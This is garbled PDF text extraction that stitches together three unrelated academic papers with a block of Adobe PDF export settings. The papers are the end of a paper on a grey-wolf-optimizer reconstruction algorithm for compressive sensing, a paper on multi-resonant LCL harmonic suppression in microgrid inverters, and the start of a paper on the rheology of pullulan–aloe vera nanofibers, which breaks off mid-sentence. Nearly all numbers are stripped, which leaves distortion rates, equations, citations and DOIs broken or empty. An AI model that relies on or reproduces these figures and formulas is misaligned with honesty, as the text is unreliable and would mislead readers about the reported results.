fft domain as signal transformer, the anmse of all algorithms increases, but still gwra provides the best performance. figure anmse in gwra, sp, fbp, lp, omp and cosamp algorithms using dct domain (case study). full-size doi: . /peerj-cs. /fig- figure anmse in gwra, sp, fbp, lp, omp and cosamp algorithms using fft domain (case study). full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as a last test in case study, the performance of gwra, sp, fbp, lp, omp and cosamp are evaluated in terms of mape. it shows that gwra still succeeds to be superior in the reconstruction performance than the others in terms of reducing mape as shown in fig. . complexity analysis figure shows the complexity in the gwra, omp, cosamp and sp algorithms. it is clear that as swarm algorithm, the complexity of the proposed algorithm is higher than the ga but it is more efficient in data reconstruction. however, the high complexity in gwra does not represent a problem, since the algorithms will be executed at the bs which has enough hardware capability and not energy constraint. figure mape in gwra, sp, fbp, lp, omp and cosamp algorithms for weather trace (case study). full-size doi: . /peerj-cs. /fig- sparsity level . . . . a v e ra g e r u n t im e ( s e c ) × - sp omp cosamp gwra figure complexity comparison gwra, omp, cosamp and sp algorithms. full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ image reconstruction test in this test, we aim to evaluate the reconstruction performance of the gwra, where it is used to reconstruct � campanile image, which is a typical sight on the berkeley campus (https://github.com/dfridovi/compressed_sensing) (fridovich-keil & kuo, ), as shown in fig. . it can be noted that gwra efficiently succeeds to reconstruct the test image with small error which proves the efficiency of gwra. conclusion in this paper, a novel reconstruction approach for cs signal, based on gwo has been presented which integrates between ga and gwo algorithms to utilize their advantages in fast implementation and finding optimal solutions. in the provided experiments, gwra exhibited better reconstruction performance for gaussian and uniform sparse signals. gwra achieved overwhelming success over the traditional ga algorithms cosamp, omp, fbp and sp. also, gwra provided better reconstruction performance than other swarm algorithms ba and pso. gwra successfully reconstructed datasets of weather observations as a case study and it is shown that gwra succeeded to recover the data correctly with lesser anmse and mape than compared with existing algorithms. the demonstrated performance prove that gwra is a promising technique that provides significant reduction in reconstruction errors. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � ahmed aziz conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or figure gwra based image reconstruction test: (a) original image and (b) the reconstructed image. full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dfridovi/compressed_sensing http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � karan singh conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � ahmed elsawy conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � walid osamy conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � ahmed m. khedr conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: matlab code is available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. rferences ali mi, gao f, mileo a. . citybench: a configurable benchmark to evaluate rsp engines using smart city datasets. in: the semantic web - iswc - th international semantic web conference, october – , , bethlehem, pa, usa. bao w, liu h, huang d, hua q, hua g. . a bat-inspired sparse recovery algorithm for compressed sensing. computational intelligence and neuroscience : doi . / / . burak n, erdogan h. . compressed sensing signal recovery via forward–backward pursuit. digital signal processing ( ): – doi . /j.dsp. . . . candes e, tao t. . robust uncertainty principles: exact signal reconstruction from highly incomplete frequency information. ieee transactions on information theory ( ): – doi . /tit. . . canli t, gupta a, khokhar a. . power efficient algorithms for computing fast fourier transform over wireless sensor networks. in: ieee international conference on computer systems and applications, . piscataway: ieee, – . cevher v, jafarpour s. . fast hard thresholding with nesters gradient method. in: workshop on practical applications of sparse modeling. available at https://infoscience.epfl.ch/record/ /files/nips _ .pdf. aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / / http://dx.doi.org/ . /j.dsp. . . http://dx.doi.org/ . /tit. . https://infoscience.epfl.ch/record/ /files/nips _ .pdf https://infoscience.epfl.ch/record/ /files/nips _ .pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chartrand r, yin w. . iteratively reweighted algorithms for compressive sensing. in: ieee international conference on acoustics, speech and signal processing. piscataway: ieee, – . choi k, wang j, zhu l, suh ts, boyd s, xing l. . compressed sensing based cone-beam computed tomography reconstruction with a first-order method. medical physics ( ): – doi . / . . dai w, milenkovic o. . subspace pursuit for compressive sensing signal reconstruction. ieee transactions on information theory ( ): – doi . /tit. . . davenport ma, boufounos pt, wakin mb, baraniuk rg. . signal processing with compressive measurements. ieee journal of selected topics in signal processing ( ): – doi . /jstsp. . . donoho d. . compressed sensing. ieee transactions on information theory ( ): – . donoho dl, tsaig y, drori i, starck jl. . sparse solution of underdetermined systems of linear equations by stagewise orthogonal matching pursuit. ieee transactions on information theory ( ): – doi . /tit. . . du x, cheng l, chen d. . a simulated annealing algorithm for sparse recovery by l minimization. neurocomputing : – doi . /j.neucom. . . . du xp, cheng lz, liu lf. . a swarm intelligence algorithm for joint sparse recovery. ieee signal processing letters ( ): – doi . /lsp. . . duarte-carvajalino jm, sapiro g. . learning to sense sparse signals: simultaneous sensing matrix and sparsifying dictionary optimization. ieee transactions on image processing ( ): – doi . /tip. . . faris h, aljarah i, azmi al-betar m, mirjalili s. . grey wolf optimizer: a review of recent variants and applications. neural computing and applications ( ): – doi . /s - - - . fridovich-keil d, kuo g. . image compression using compressed sensing. available at https://github.com/dfridovi/compressed_sensing. mallat s, wavelet a. . tour of signal processing. new york: academic press. mallat sg, zhang z. . matching pursuits with time-frequency dictionaries. ieee transactions on signal processing ( ): – doi . / . . mirjalili s, mohammad mirjalili s, lewis a. . grey wolf optimizer. advances in engineering software : – . needell d, tropp ja. . cosamp: iterative signal recovery from incomplete and inaccurate samples. applied and computational harmonic analysis ( ): – doi . /j.acha. . . . needell d, vershynin r. . uniform uncertainty principle and signal recovery via regularized orthogonal matching pursuit. foundations of computational mathematics ( ): – doi . /s - - - . pant jk, lu w, antoniou a. . new improved algorithms for compressive sensing based on lp norm. ieee transactions on circuits and systems ii: express briefs ( ): – . tropp ja, gilbert ac. . signal recovery from random measurements via orthogonal matching pursuit. ieee transactions on information theory ( ): – doi . /tit. . . aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /jstsp. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /lsp. . http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /s - - - https://github.com/dfridovi/compressed_sensing http://dx.doi.org/ . / . http://dx.doi.org/ . /j.acha. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gwra: grey wolf based reconstruction algorithm for compressive sensing signals introduction problem formulation related research grey wolf optimizer background grey wolf reconstruction based algorithm simulation results conclusion rferences << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research on multi - resonant lcl harmonic suppression strategy jingwen chen, xin zhou and hongshe dang* school of electrical and information engineering shaanxi university of science and technology shaanxi , china *address correspondence to this author at xuefu road, xi'an, china, ; e-mail: @qq.com abstract—aiming at the resonance problem in the process of grid connection of lcl filter microgrid inverter, a multi-resonance lcl harmonic suppression strategy is proposed. on the basis of analyzing the principle and establishing the mathematical model in detail, the realization process of the multi-resonance constant power compound control strategy is studied emphatically. through the simulation, the validity of the control strategy is verified, the results show that the scheme stabilizes the output power and reduces the total harmonic distortion of the grid-connected inverter to . %, and the corresponding phase current distortion rate drops to . %.the suppression effect is obvious, it is an effective harmonic suppression method. keywords-microgrid inverter;harmonic;multi resonance control;constant power control i. introduction with the depletion of traditional energy sources, the new energy power generation system with microgrid as the carrier has been developed rapidly because of its flexible, decentralized, small, close to users and the use of clean energy. due to the energy structure of the micro grid mainly clean energy such as wind power, photovoltaic power generation, the distributed energy will generally need electricity to the grid through power electronic converter device to realize grid connected. therefore, a lot of power electronic devices access to power grid harmonics, caused the converter power factor lower and parallel resonant circuit or series resonance, decrease active reactive power measurement accuracy, reduce the quality of power supply a series of problems, give the user the safe and security, economic operation of power system brings great harm. so harmonic suppression is very important. current research of harmonic suppression methods, mainly has: the harmonic suppression method based on active filter [ ] [ ] [ ]; the micro-grid harmonic suppression based on virtual impedance [ ]; lcl type grid-connected inverter harmonic suppression [ ] [ ] [ ] [ ] and so on. compared to l-filter, lcl-type filter has a third-order low-pass filter characteristics,( lcl filter with third order low pass filter properties), so for the same harmonic standard and lower switching frequency, we can use a relatively small filter inductor design, effectively reduce the system size(volume) and reduce losses, but the same will bring resonance problems. in this paper, a harmonic control strategy of micro-grid inverter based on pi control, multi-resonance control and lcl constant power control is proposed, which is used in the process of grid-connected control of micro-grid inverter to further reduce and net voltage of the total harmonic distortion rate, get better power of the grid. ii. material and methods a. principle block diagram of multi resonance lcl harmonic suppression strategy figure is lcl multi-resonant constant power grid control system block diagram. where ref p ref q are the international journal of advanced network, monitoring and controls volume , no. , actual active and reactive power reference values, abc v 、 abc i are the actual values of the grid voltage and current, d v 、 q v and d i 、 q i are the voltage components of the dq axis, dref i and qref i are the capacitor current reference value, cd i 、 cq i 、 cdref i 、 cqref i are the capacitance current detection value on the dq axis components and capacitance current reference value. the figure includes pq control module, current loop multi-resonance control module, and pwm modulation module etc. micro-network inverter grid output voltage abc v and current detection values oabc i ,after coordinate transformation to get 、 and 、 ,will be sent to the pq controller; pq controller according the active and reactive setpoint ref p and ref q to calculate the current reference values and and then compare with the current detection value of the components and . and after the ratio multi-resonant regulator in the current loop control module, the reference values , of the capacitive current are obtained, then compared with the capacitance current detection value αβ component and . and then adjusted by the proportional regulator g_ (s), the control pwm circuit drives the inverter, so that the inverter output active power and reactive power constant. in order to meet the requirements of system stability, the current loop control module in figure solves the resonance problem caused by lcl, and achieves the purpose of suppressing low frequency harmonics and improves the system accuracy. figure . principle block diagram of multi resonance lcl harmonic suppression strategy b. multi - resonant lcl grid - connected control mathematical model figure constitutes a third-order lcl-type filter, where l is the inductance, r is its internal resistance and the equivalent resistance between the upper and lower legs of each phase, r is the internal resistance of l . in the case of three-phase grid voltage symmetry, the mathematical model is as follows:                dc k no s di t di t l r i t l r i t dt dt u t s t u u t               c du t c i t i t dt             , , dc dc dc k k k a b c du t i t c i t s t dt             , , dc no k k a b c u t u t s t      international journal of advanced network, monitoring and controls volume , no. , where k s is the switching function of the power switching device, when k s  , the upper arm is turned on and the lower arm is turned off; when k s  , the upper arm off, the lower arm conduction. corresponding to the relationship between α and β stationary coordinate system is as follows:  ca c c c c c di l u u r i dt di l u u r i dt di l u e r i dt di l u e r i dt i i i i i i                                       i  、 i  、 i  、 i  are the α and β components of the input and output currents in the αβ coordinate system; c i  、 c i  、 c u  、 c u  are the α and β components of the capacitive current and voltage in the αβ coordinate system; e  and e  are the α and β components of the grid voltage in the αβ coordinate system. c. a block diagram of current loop control lcl-type filter in the better suppression of high-frequency harmonics at the same time, because of its own structure for a third-order system, easy to produce resonance, the frequency near the narrow band and too high gain, will lead to the system and the load parameter changes are very sensitive, affecting the stability of the system to bring a series of impact and harm to the grid. in order to reduce its sensitivity and high gain characteristics, to achieve the ac signal without static tracking, this paper on the basis of the use of active damping introduced into the capacitor current loop regulation to suppress high frequency interference, and the external loop current using proportional resonance control , constructs a transfer function that performs ac compensation on the reference input signal. so that in a specific bandwidth in the same frequency response characteristics, to meet the system stability requirements, so that the output at the resonant frequency at high gain, the other frequency segment attenuation. thus reducing the resonance, improve the stability of the system and control accuracy. the control block diagram is showas follows: figure . block diagram of current loop control as shown in figure where selected proportional resonance regulator, selected proportional regulator. after the current is transformed by the coordinate, the voltage and current 、 and 、 in the two stationary coordinates are obtained and sent to the pq calculation module to obtain the reference current 、 ,and then compared with and obtained the deviation by the proportionmulti-resonant regulator in the current loop control module , get the capacitor current reference value and , and it is compared with the capacitance current detection value αβ component and , after adjusting the proportional regulator , then control pwm circuit drives the inverter, so that the inverter output active power and reactive power constant. d. pr control since the pr regulator is equivalent to the pi modulator in the stationary coordinate system under the αβ coordinate, international journal of advanced network, monitoring and controls volume , no. , the pr regulator can also be used to design the pi regulator parameter. figure in the parallel current and reference current deviation, through the multi-resonant control get the capacitor current reference value cref i , cref i and the actual capacitance of the current deviation, and then through the proportional control, the resulting signal through the pwm modulation to achieve active damping control. the use of a proportional feedback control of the capacitor current, stabilize the capacitor voltage, and enhance the stability of the system. the parallel current and capacitive current transfer functions are as follows:        ref pwm pwm i pwm pwm pwm i i s g s i s kk k s kk k l l cs kk l cs ls kk s kk k          the corresponding characteristic equation is:    pwm pwm pwm i d s l l cs kk l cs ls kk s kk k       according to the rouse stability criterion, the system stability condition is calculated as:    pwm i k l l k l k l kk k l c          according to the stability criterion (formula ) to set the parameters, so that when the grid to reach a stable state. iii. multiple pr control a single pr regulator generates an infinite gain at a specific frequency. in order to ensure its stability and easy to achieve, using the approximate structure; its transfer function is as follows:the transfer function is as follows: hwcs s wcs wh ( ) where is the scale factor, is the frequency adjustment coefficient, is the resonance coefficient, and is the resonant frequency. in order to achieve the , , harmonic current compensation need to re-connect three resonant controller. the transfer function of the current inner loop multi-resonance controller is:  the minimum value of the resonant frequency in the lcl grid-connected inverter is: ( ) then the minimum value of k is:  in order to ensure the stability of the control system, the cutoff frequency should be chosen to be less than so the in the multi-resonance pr control can be approximated by the cutoff frequency :  according to the scope of k and the specific control requirements, through the control system open-loop baud diagram for parameter adjustment. iv. discussion based on the detailed analysis of the principle of multi-resonance constant power control, the simulation results of the mathematical model are as follows international journal of advanced network, monitoring and controls volume , no. , figure . dc side voltage control after active, no power waveform as shown above, the active and reactive power of the output after lcl multi-resonant constant power control is constant, which ensures the stable operation of the system. figure . by lcl multi-resonant constant power control before and after the voltage waveform from fig. , we can find that the voltage and current waveforms before the lcl multi-resonant constant power control are unstable and distorted. after the control of the voltage and current waveform is improved, harmonic suppression effect is obvious. figure . by lcl multi-resonant constant power control before and after the current waveform from the above figure can be found by the lcl multi-resonant constant power control after the current waveform has improved. in order to analyze the filtering effect by lcl multiresolution constant power control, the voltage distortion rate, the total voltage distortion rate and the current distortion rate of the respective voltage waveforms before and after the control are summarized as shown in table and respectively. table i. lcl multi-resonant constant power grid-connected control before and after the voltage harmonic content voltage distortion rate current distortion rate before filtering . % . % after filtering . % . % table ii. lcl multi-resonant constant power control before and after the voltage and current distortion number of harmonics before filtering . % . % . % after filtering . % . % . % from table , it can be found that the contents of the harmonics before the filtering are reduced and have an inhibitory effect. international journal of advanced network, monitoring and controls volume , no. , table can be seen by lcl multi-resonant constant power control filter before the voltage distortion rate of . %, a phase current distortion rate of . %, filtered voltage distortion rate reduced to . %, the corresponding phase current distortion small to . inhibitory effect is obvious. v. conclusion in this paper, a harmonic suppression strategy for micro-grid inverter combined with lcl constant power control and multi-resonant pi control is proposed for the resonant problem of lcl filter microgrid inverters. it is found that the scheme stabilizes the output power lcl and reduces the total harmonic distortion rate of the grid inverter to . % and the corresponding phase current distortion rate is reduced to . %. the harmonic suppression effect is obvious. references [ ] shang taohong. study and parameter design of shunt hybrid active power filter [j] proceedings of the computer science, , ( ): - . [ ] li yan, luo an, fang lu, wang wen. high voltage type hybrid active power filter [j]. journal of electric technology, , ( ): - [ ] wang jidong, qin meicui. micro grid harmonic suppression method [j]. journal of tianjin university apf based on the (science and technology edition), , ( ): - [ ] li li. study on hierarchical control and power quality improvement of microgrid [d]. beijing: north china electric power university, [ ] han yongru, xue shilong, and study on the control strategy of grid connected inverter based on lcl filter [j]. shanghai: maritime university, , ( - ): (in chinese) [ ] huang yafeng, li long, yan gangui large capacity pv inverter lcl filter parameter optimization design [j]. beijing: north china electric power university, , ( ): - [ ] zhang xing, li fei, and in the grid connected inverter lcl filter improved topology [j]. hefei: hefei university of technology, , : - [ ] xu jinming, xie shaojun, l l filter grid connected inverter robust current control [j]. nanjing: nanjing university of aeronautics and astronautics, , ( ): - [ ] yang kun, xie chuan, chen guozhu. current control of static reactive power generator based on frequency adaptive resonance controller [j]. journal of electrical engineering, , ( ): - . [ ] zhang zhicheng, liu zhenlai, guan huchang. island micro grid harmonic control method of [j]. power electronic technology, , ( ): - chen jingwen ( -), male (han nationality), inner mongolia chifeng people, associate professor, graduate tutor, research direction for micro-grid technology and application, e-mail: chenjw@sust.edu.cn zhou xin ( -), female (han), xianyang, shaanxi, master, research direction for micro-grid harmonics, inter-harmonics of the study dang hongshe( -), male (han nationality), shaanxixianyang people, professor, research direction for micro-gridtechnology and application, (corresponding author: e-mail: @qq.com) mailto: @qq.com conference full paper template international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - rheological properties of pullulan and aloe vera nanofiber solutions haifa el-sadi wentworth institute of technology boston, usa e-mail: elsadih@wit.edu sally shady stevens institute of technology, hoboken, nj e-mail: sshady@stevens.edu alex bossart stevens institute of technology, hoboken, nj dilhan kalyon stevens institute of technology, hoboken, nj abstract—nanofibers have been used with increasing success for drug delivery and various biomedical engineering applications. the mixture of % pullulan- aloe vera can be pumped with a minor effects on the flow behavior. the fiber is then characterized by sem, shear viscosity, storage and loss moduli. the oscillatory shear data is employed. the mixture has a complex rheological properties that includes extreme shear- thinning as well as viscoelastic properties and yield stress. the rheology of the pullulan- aloe vera nanofber was characterized, the measurement method may influence the results, it is unclear how the behavior near walls influence the measurement method, parallel-plate rheometer is used to measure rheological properties. the data and rheological parameters should facilitate a better understanding of the process-ability characteristics of the mixture. the cross model provides a simple way of quantifying the viscosity/shear rate profile for a shear thinning mixture. sem images are carried out. keywords-nanofiber; rheology; pulluan; aloevera; yield stress i. introduction aloe vera is a therapeutic medicinal plant that has been used for many centuries to treat a wide range of ailments. there are over species of the aloe vera plant that have been studied. the most popular commercially grown are aloe barbadensis miller and aloe arborescens [ ]. many of the health benefits are associated with the structure and internal composition of the plant. studies have shown that the active ingredients in the aloe vera plant have demonstrated wound healing, antifungal, anti-inflammatory, anticancer, immunomodulatory and gastroprotective properties [ - ]. despite the exceptional healing properties of the aloe vera plant, there are several limitations with keeping these active ingredients stable. the bioactivity of the plant decreases approximately hours after harvesting [ , ]. exposure to light, humidity and temperature can also diminish these significant properties. current techniques used to overcome these challenges have been focused on the usage of antioxidants and stabilizing agents. such methods introduce other chemicals that would limit the scalability and purity of using non-toxic ingredients. pullulan is a linear polysaccharide produced by the polymorphic fungus aureobasidium pullulans. pullulan has a wide range of commercial and industrial applications in many fields such as food science, health care, pharmacy and even in lithography [ - ]. pullulan is a water-soluble, low moisture permeable polysaccharide with excellent mechanical properties[ ]. due to these properties, pullulan is often used as a drug tablet coating. as a result, pullulan has been used in many drug delivery applications including nanotechnology [ , - ]. nanofibers have been used with increasing success for drug delivery due to their extremely high surface to volume ratio, low density, and high porosity [reference]. in order to prevent aloe vera from international journal of advanced network, monitoring and controls volume , no. , degrading, it can be electrospun into nanofibers to encapsulate, preserve and administer the unique properties of aloe vera. pullulan, is a biodegradable polymer with adhesive properties that can has been shown success in the electrospinning [ ]. in this study, we investigate the rheological properties of pullulan- aloe vera nanofibers, which will provide insight into the material properties in a scaled-up manufacturing process. ii. materials and method a. nanofiber preparation a mixture of polymer pullulan pf- food grade (nagase, japan), molecular weight , g/ mol and fresh aloe vera were used to create nanofibers. to prepare the nanofibers, first aloe vera leaves were first washed and their outer green rinds were removed to obtain the gel fillet. the gel was then broken down by using a conventional blender (ninja bl t) at an agitator speed of rpm. the procedure was performed within s to avoid enzymatic decomposition [ ]. a homogenous gel mixture was then formed using % pullulan. the solution was then electrospun using a harvard apparatus phd syringe pump at and kv with a distance of cm and a flowrate of . µl/mine.. b. scanning electron microscopy (sem) a zeiss auriga focused ion fe sem (oberkochen, germany). all materials were coated with gold nanoparticles for one minute using a leica em med (wetzlar, germany) under vacuum. analysis was carried out at . kv eht, and estimation of the dimensions of the fibers was performed using imagej and diameterj. c. rheological properties prepared mixture was loaded between two mm- diameter parallel plates with a gap of . mm in rheometer (ares). high frequency and strain were chosen to make sure that enough torque was generated for the transducer. time sweep test with frequency of rps and strain of % was performed to analyze the evaporation effect of the mixture to the result. prior to dynamic property measurements, strain sweep test at constant frequency of rps determined the linear viscoelastic regions. frequency range of - rps and strain of % (within linear viscoelastic region) was performed in frequency sweep test at room temperature to obtain dynamic properties (g’,g’’) of the mixtures. g’, the storage modulus which describes the elastic properties and g’’, the loss modulus, which describes the viscous properties, were calculated by a computer program of the rheometer by deconvolution the torque (shear stress) versus time data. iii. discussion the homogenous solution of % pullulan in aloe vera were prepared to study the rheological properties of these nanofibers as shown in figure . these properties will demonstrate the capabilities of the material solution in manufacturing processes such as d printing and extrusion. to our knowledge, this is the first study to prepare pullulan-aloe vera nanofibers from a fresh aloe vera plant. with the medicinal properties of aloe vera, pullulan is used as a carrier to help stabilize the bioactivity. sem images confirmed that pullulan- aloe vera nanofibers can be successfully developed as shown in figure and . the kv group produced + nm while the kv group was + nm [ ]. fibers prepared at the kv setting produced nanofibers that were more consistent. the storage (elastic) and loss (viscous) modulus of the mixture (pullulan and aloe vera) at oc for s are increasing with the frequency as shown in figure . the storage and loss modulus are almost constant at low frequency and increase significantly at higher frequencies which is related to the increase in the interaction between mixture components. it is observed that the viscous modulus is significantly larger than the storage modulus. it is very obvious that viscous modulus is higher than elastic modulus. figure shows the viscoelastic behavior of the mixture of pullulan and aloe vera, the complex modulus increases with increasing the frequency. international journal of advanced network, monitoring and controls volume , no. , figure . the overall process to develop the nanofiber demonstrating the multiple applications. figure . nanofiber using phd syringe pump at kv (a) , times magnification, (b) , times magnification figure . nanofiber using phd syringe pump at kv (a) , times magnification, (b) , times magnification international journal of advanced network, monitoring and controls volume , no. , figure . elastic and viscous modulus of a mixture as a function of frequency at oc. figure . complex modulus as a function of frequency at oc figure describes the changes in viscosity of the mixture of pullulan and aloe vera with respect to stress. the figure shows that the viscosity is decreasing with increasing the stress. such viscosity decrease is directly related to the decrease of zeta potential. the yield stress is a key parameter in production, determining the force required to fill a product into its container or to flow. the stress at the viscosity maximum, is a measure for the yield stress. the yield stress is . pa which it shows that small amount of force is required to flow. international journal of advanced network, monitoring and controls volume , no. , figure . (a) viscosity vs. stress, (b) viscosity vs. shear rate cross rheological model shear thinning model gives a good agreement with measured data. γ̇ is the shear rate, η , the zero shear viscosity and it is zero. m is the cross rate constant. it is dimensionless and is a measure of the degree of dependence of viscosity on shear rate in the shear thinning region. a value of zero for m shows newtonian behavior and if m = , it is due to increasing shear thinning behavior 𝜂 = 𝜂∞ + 𝜂 − 𝜂∞ + (𝑐𝛾)̇𝑚 ( ) η = η∞ − η∞ + (cγ)̇m ( ) c is the cross time constant and has time unit. m and /c are related to the texture of the mixture, pumping and the characteristics of mixing and pouring of the flow. figure indicates that at c= , the cross model fits the experimental data at shear rate above than . /s. this might be due to the experimental error. above c= the cross model isn’t applicable for this type of mixture. international journal of advanced network, monitoring and controls volume , no. , figure . validation of cross model with experimental data. the rheometer was again used for stress relaxation 